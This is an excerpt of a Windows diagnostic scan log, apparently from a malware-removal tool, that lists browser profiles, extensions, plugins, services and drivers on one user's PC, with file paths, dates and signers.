FF DefaultProfile: vtnva5hp.default
FF DefaultProfile: dpdx1dpi.default
FF DefaultProfile: 39pruj5d.default
FF DefaultProfile: 5fn2593k.default
FF ProfilePath: C:\Users\John\AppData\Roaming\Zotero\Zotero\Profiles\vtnva5hp.default [2023-04-16]
FF ProfilePath: C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default [2019-07-14]
FF NetworkProxy: old Mozilla\Firefox\Profiles\dpdx1dpi.default -> backup.ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\@flash_debugger.xpi [2019-07-14]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\sp@avast.com.xpi [2019-01-23]
FF Extension: (Avast Online Security) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\wrc@avast.com.xpi [2018-07-17]
FF Extension: (Video DownloadHelper) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2018-07-22]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default [2019-07-14]
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default\Extensions\@flash_debugger.xpi [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\39pruj5d.default [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\ly01ikd2.default-release [2023-07-30]
FF NetworkProxy: Mozilla\Firefox\Profiles\ly01ikd2.default-release -> backup.ftp", "89.221.223.204"
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\5fn2593k.default [2021-06-06]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default [2021-06-09]
FF NetworkProxy: Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default -> ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default\Extensions\@flash_debugger [2017-04-12] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2023-03-08] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin: @java.com/DTPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\dtplugin\npDeployJava1.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\plugin2\npjp2.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=3 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=9 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
StartMenuInternet: Firefox-CA9422711AE1A81C - C:\Program Files\Firefox Developer Edition\firefox.exe

Chrome:
=======
CHR Profile: C:\Users\John\AppData\Local\Google\Chrome\User Data\Default [2023-11-24]
CHR Extension: (Ban Checker for Steam) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\canbadmphamemnmdfngmcabnjmjgaiki [2023-10-12]
CHR Extension: (CSS Used) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cdopjfddjlonogibjahpnmjpoangjfff [2023-04-17]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2023-11-12]
CHR Extension: (Steam Inventory Helper) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmeakgjggjdlcpncigglobpjbkabhmjl [2023-11-22]
CHR Extension: (Avast Online Security & Privacy (BETA)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\daanglpcpkjjlkhcbladppjphglbigam [2023-01-19]
CHR Extension: (BuiltWith Technology Profiler) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dapjbgnjinbpoindlpdmhochffioedbn [2022-05-12]
CHR Extension: (Slither.io Skins, Mods, Hack & Guide) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dggomkijbihggjgcgdbnleolpleddaid [2016-06-12]
CHR Extension: (Session Buddy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\edacconmaakjimmfgnblocblbcdcpbko [2023-11-12]
CHR Extension: (Zotero Connector) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekhagklcjbdpajgpjgmbionohlpdbjgc [2023-10-02]
CHR Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2023-04-30]
CHR Extension: (DarkOrbit SID Login) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgkcmijdllamjcbfeeheebbphpnbmbco [2019-07-01]
CHR Extension: (Video Downloader PLUS) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhplmmllnpjjlncfjpbbpjadoeijkogc [2020-09-29]
CHR Extension: (Word Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiombgjlkfpdpkbhfioofeeinbehmajg [2021-05-13]
CHR Extension: (Bad Connection Simulator) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gflankmgolakfdeiponkgmbhbhpdmjlg [2023-10-17]
CHR Extension: (Google Docs Offline) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2023-06-01]
CHR Extension: (Avast Online Security & Privacy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2023-01-17]
CHR Extension: (Multi Session Box - Multi login any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\hojmmbfmaddjdkkcgbiipkphdcfmkhge [2021-09-04]
CHR Extension: (Stream Video Downloader) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-14]
CHR Extension: (Unseen for Facebook) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jiomcgpfgkeefipihnplhadgdoollmap [2021-01-08]
CHR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2023-07-30]
CHR Extension: (Chromebook Recovery Utility) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jndclpdbaamdhonoechobihbbiimdgai [2022-06-02]
CHR Extension: (Application Launcher For Drive (by Google)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2023-01-26]
CHR Extension: (WebChatGPT: ChatGPT with internet access) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfemeioodjbpieminkklglpmhlngfcn [2023-11-24]
CHR Extension: (PowerPoint Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdafamggmaaaginooondinjgkgcbpnhp [2020-03-24]
CHR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-19]
CHR Extension: (Twitch Now) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlmbdmpjmlijibeockamioakdpmhjnpk [2021-06-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Font Changer) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\obgkjikcnonokgaiablbenkgjcdbknna [2023-06-06]
CHR Extension: (Proxy SwitchyOmega) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\padekgcemlokbadohgkifijomclgjgif [2020-12-20]
CHR Extension: (Cold Turkey Blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\pganeibhckoanndahmnfggfoeofncnii [2023-11-17]
CHR HKU\S-1-5-21-949114339-2066100574-2594248327-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [daanglpcpkjjlkhcbladppjphglbigam]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2012-09-23]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]

Opera:
=======
OPR Profile: C:\Users\John\AppData\Roaming\Opera Software\Opera Stable [2023-11-25]
OPR DownloadDir: I:\stahovanie
OPR Notifications: Opera Stable -> hxxps://aternos.org; hxxps://forum24.os.tc; hxxps://mail.google.com; hxxps://meet.google.com; hxxps://opencsgo.com; hxxps://skinodds.com; hxxps://www.pvpro.com; hxxps://www.tipsport.sk
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=o ... utEncoding}
OPR Extension: (Custom Page Zoom) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\acfbkfekhjlboehfjgdidogogpbklcdm [2023-08-18]
OPR Extension: (AdNauseam) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\dklmdhmkdbinnceekhecifmjhiiabolp [2023-10-31]
OPR Extension: (Rich Hints Agent) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2023-10-17]
OPR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gjpihpkhgfngnbhhfdehlcmgfahbciip [2022-07-26]
OPR Extension: (Opera Wallet) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2023-11-10]
OPR Extension: (Twitch Now) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hiahmjdojdodmjjhhddegdnhcpjmokmo [2021-06-20]
OPR Extension: (Scripter) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hpochgedhgonjnpbepkbnkkibkjigknc [2021-09-08]
OPR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2021-11-03]
OPR Extension: (Deezer™ Downloader (Deezloader)) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jnmflndddcmkajmkoahaenmnfbdckaom [2022-02-28]
OPR Extension: (Amazon Assistant Promotion) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2021-08-14]
OPR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-20]
StartMenuInternet: (HKLM) Opera GXStable - C:\Program Files\Opera GX\Launcher.exe

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [173040 2022-09-26] (Adobe Inc. -> Adobe Inc.)
S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [818128 2018-04-24] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
S4 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2321384 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2128872 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S2 apacheds-default; C:\Program Files (x86)\ApacheDS\bin\wrapper.exe [204800 2020-02-28] () [File not signed]
S4 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [8477080 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [621728 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Tools; C:\Program Files\AVAST Software\Avast\aswToolsSvc.exe [351848 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avastm; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 AvastSecureBrowserElevationService; C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\elevation_service.exe [1136920 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> )
S4 CDROM_Detect; C:\Program Files\4G LTE Modem\4G_Server.exe [327680 2016-11-19] () [File not signed]
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2776664 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1467072 2016-05-30] (Disc Soft Ltd -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-04-16] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-10-06] (Epic Games Inc. -> Epic Games, Inc.)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [206304 2021-03-31] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 ewserver; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe [191664 2018-02-26] (Trace Software International -> )
S4 FACEITService; C:\Program Files\FACEIT AC\FACEITService.exe [20756320 2020-05-01] (FACE IT LIMITED -> )
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [82216 2021-02-17] (Mixbyte Inc -> Freemake)
R2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [3361736 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S4 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-09-19] (Hi-Rez Studios) [File not signed]
S4 impi_hydra; C:\Program Files\Common Files\SolidWorks Shared\Simulation Worker Agent\hydra_service.exe [880296 2018-02-26] (Intel(R) Software Development Products -> Intel Corporation)
S4 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S4 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193656 2016-03-30] (Logitech Inc -> Logitech Inc.)
S2 MBAMService; I:\windows programy\malware bytes\MBAMService.exe [9343840 2023-11-23] (Malwarebytes Inc. -> Malwarebytes)
S4 memcached; c:\memcached\memcached.exe [507640 2009-12-16] () [File not signed]
S4 MSSQL$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\sqlservr.exe [372416 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
S4 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [100672 2020-04-17] (ProtonVPN AG -> )
S4 ProtonVPN Update Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.UpdateService.exe [61760 2020-04-17] (ProtonVPN AG -> )
S4 QMEmulatorService; D:\Program Files\TxGameAssistant\AppMarket\QMEmulatorService.exe [166384 2019-12-20] (Tencent Technology(Shenzhen) Company Limited -> Tencent)
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] (Razer USA Ltd. -> )
R2 RemoteSolverDispatcher; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe [264704 2018-02-26] (Mentor Graphics Corporation -> Mentor Graphics Corporation)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2017072 2022-02-02] (Rockstar Games, Inc. -> Rockstar Games) [File not signed]
R2 SbieSvc; D:\windows programy\Sandboxie-Plus\SbieSvc.exe [363992 2022-08-29] (Tonalio GmbH -> Sandboxie-Plus.com)
R2 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2018-05-27] (SolidWorks) [File not signed]
S4 SQLAgent$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [613056 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R2 Synology Drive VSS Service x64; C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe [370824 2022-03-29] (Synology Inc. -> )
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [18035512 2023-10-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 ucldr_battlegrounds_gl; C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe [7099632 2021-07-21] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S4 uncheater_bgl; C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe [2097008 2020-11-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S2 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [746504 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R2 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10430256 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [15477208 2020-03-07] (VMware, Inc. -> )
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56552 2016-03-22] (Microsoft Corporation -> Microsoft Corporation)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [147392 2019-04-30] (Microsoft Corporation -> Microsoft Corporation)
S4 wampapache64; c:\wamp64\bin\apache\apache2.4.33\bin\httpd.exe [30720 2018-03-18] (Apache Software Foundation) [File not signed]
S4 wampmariadb64; c:\wamp64\bin\mariadb\mariadb10.2.14\bin\mysqld.exe [14550440 2018-03-26] (MariaDB Corporation Ab -> )
S4 wampmysqld64; c:\wamp64\bin\mysql\mysql5.7.21\bin\mysqld.exe [39551488 2017-12-28] () [File not signed]
R2 WebDriveService; C:\Program Files\WebDrive\wdService.exe [12388232 2019-12-20] (South River Technologies -> South River Technologies, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [7531208 2021-08-01] (PUBG CORPORATION -> PUBG Corporation)
S2 IpOverUsbSvc; "C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe" [X]
S2 SWVisualize2018.BoostService; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize Boost\SWVisualize.BoostService.exe" [X]
S2 SWVisualize2018.Queue.Server; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 amdkmdap; C:\Windows\System32\Drivers\amdkmdap.sys [614280 2020-11-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 asmthub3; C:\Windows\System32\DRIVERS\asmthub3.sys [140032 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R3 asmtxhci; C:\Windows\System32\DRIVERS\asmtxhci.sys [424192 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [36792 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [208672 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [332880 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [247888 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [97360 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42424 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [176384 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswNetHub; C:\Windows\System32\drivers\aswNetHub.sys [522480 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R3 aswNetNd6; C:\Windows\System32\DRIVERS\aswNetNd6.sys [38152 2020-04-15] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [108928 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [84496 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [851256 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [469472 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [216984 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [326064 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [58368 2009-06-02] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
S3 CMUAC; C:\Windows\System32\DRIVERS\Headset6400x1.SYS [386560 2013-10-03] (C-MEDIA ELECTRONICS INC. -> A4Tech Inc.)
S3 CT_QUALCOMM_U_drv; C:\Windows\System32\DRIVERS\CT_QUALCOMM_U_drv.sys [118016 2009-04-27] (Microsoft Windows Hardware Compatibility Publisher -> QUALCOMM Incorporated)
R3 DroidCam; C:\Windows\System32\DRIVERS\droidcam.sys [31576 2020-04-24] (DEV47 APPS -> Dev47Apps)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 EuMusDesignVirtualAudioCableWdm; C:\Windows\System32\DRIVERS\vrtaucbl.sys [66728 2016-07-05] (NTONYX Ltd. -> Eugene V. Muzychenko)
R0 FACEIT; C:\Windows\System32\Drivers\FACEIT.sys [20193656 2020-05-01] (FACE IT LIMITED -> )
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [32384 2018-05-03] (Sony Mobile Communications AB -> Sony Mobile Communications)
R1 gvm; C:\Windows\System32\DRIVERS\gvm.sys [393712 2020-09-22] (Google LLC -> Google LLC)
S3 HidNt; C:\Windows\System32\DRIVERS\HIDNt.sys [22576 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 HidNt; C:\Windows\SysWOW64\DRIVERS\HIDNt.sys [18992 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 KProcessHacker3; C:\Program Files\Process Hacker 2\kprocesshacker.sys [45208 2016-03-29] (Wen Jia Liu -> wj32)
R2 LdBoxDrv; C:\Program Files\dnplayerext2\LdBoxDrv.sys [319376 2020-06-18] (Shanghai Changzhi Network Technology Co., Ltd. -> Oracle Corporation)
R3 LGBusEnum; C:\Windows\System32\drivers\LGBusEnum.sys [37408 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 LGVirHid; C:\Windows\System32\drivers\LGVirHid.sys [26912 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 libusbK; C:\Windows\System32\DRIVERS\libusbK.sys [47200 2018-07-23] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net)
R3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv.sys [42016 2013-11-27] (Visicom Media Inc. -> Visicom Media Inc.)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [239544 2023-11-23] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [35232 2013-12-06] (Visicom Media Inc. -> Visicom Media Inc.)
S3 navagio; C:\Program Files\Common Files\PUBG\navagio.sys [3632840 2021-08-03] (PUBG CORPORATION -> )
R1 npcap; C:\Windows\System32\DRIVERS\npcap.sys [69432 2019-09-04] (Insecure.Com LLC -> Insecure.Com LLC.)
S3 ProtonVPNSplitTunnel; C:\Program Files (x86)\Proton Technologies\ProtonVPN\x64\Win7\ProtonVPN.SplitTunnelDriver.sys [22456 2020-01-15] (ProtonVPN AG -> Proton Technologies AG)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-06-22] (Corel Corporation -> Corel Corporation)
